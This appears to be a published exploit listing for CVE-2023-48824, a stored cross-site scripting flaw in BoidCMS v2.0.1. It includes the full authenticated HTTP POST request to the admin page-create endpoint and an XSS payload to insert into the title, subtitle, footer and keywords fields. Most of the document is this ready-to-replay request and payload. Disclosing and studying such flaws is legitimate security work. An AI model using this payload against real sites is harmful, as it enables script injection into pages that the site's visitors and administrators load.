Share
## https://sploitus.com/exploit?id=PACKETSTORM:176031
# Exploit Title: BoidCMS v2.0.1 - Multiple Stored XSS  
# Date: 13/11/2023  
# Exploit Author: BugsBD Limited  
# Discover by: Rahad Chowdhury  
# Vendor Homepage: https://boidcms.github.io/#/  
# Software Link: https://github.com/BoidCMS/BoidCMS/archive/refs/tags/v2.0.1.zip  
# Version: v2.0.1  
# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56  
# CVE: CVE-2023-48824  
  
Descriptions:  
BoidCMS v2.0.1 is vulnerable to Multiple Stored Cross-Site Scripting  
(XSS) Authenticated vulnerabilities in the "title, subtitle, footer,  
keywords" parameters of settings, create page.  
  
  
Steps to Reproduce:  
  
1. Request:  
  
POST /BoidCMS/admin?page=create HTTP/1.1  
Host: 192.168.1.74  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)  
Gecko/20100101 Firefox/119.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Content-Type: multipart/form-data;  
boundary=---------------------------9882691211259772119227456445  
Content-Length: 1492  
Origin: http://192.168.1.74  
Connection: close  
Referer: http://192.168.1.74/BoidCMS/admin?page=create  
Cookie: PHPSESSID=51i07vv0i4bqf0s9sl14tshq20;  
KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;  
KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhc  
Upgrade-Insecure-Requests: 1  
  
-----------------------------9882691211259772119227456445  
Content-Disposition: form-data; name="type"  
  
post  
-----------------------------9882691211259772119227456445  
Content-Disposition: form-data; name="title"  
  
test  
-----------------------------9882691211259772119227456445  
Content-Disposition: form-data; name="descr"  
  
test  
-----------------------------9882691211259772119227456445  
Content-Disposition: form-data; name="keywords"  
  
test  
-----------------------------9882691211259772119227456445  
Content-Disposition: form-data; name="content"  
  
test  
-----------------------------9882691211259772119227456445  
Content-Disposition: form-data; name="permalink"  
  
  
-----------------------------9882691211259772119227456445  
Content-Disposition: form-data; name="tpl"  
  
theme.php  
-----------------------------9882691211259772119227456445  
Content-Disposition: form-data; name="thumb"  
  
  
-----------------------------9882691211259772119227456445  
Content-Disposition: form-data; name="date"  
  
2023-12-02T19:41  
-----------------------------9882691211259772119227456445  
Content-Disposition: form-data; name="pub"  
  
true  
-----------------------------9882691211259772119227456445  
Content-Disposition: form-data; name="token"  
  
83f330c1fea7a77a033324b848b5cd623d17d5cf25de1975ff2cce32badbe9cd  
-----------------------------9882691211259772119227456445  
Content-Disposition: form-data; name="create"  
  
Create  
-----------------------------9882691211259772119227456445--  
  
  
2. Now use xss payload "><img src=x onerror=alert(1)> on "title,  
subtitle, footer, keywords" parameters.  
3. Save and check home.  
  
  
  
## Reproduce:  
[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48824)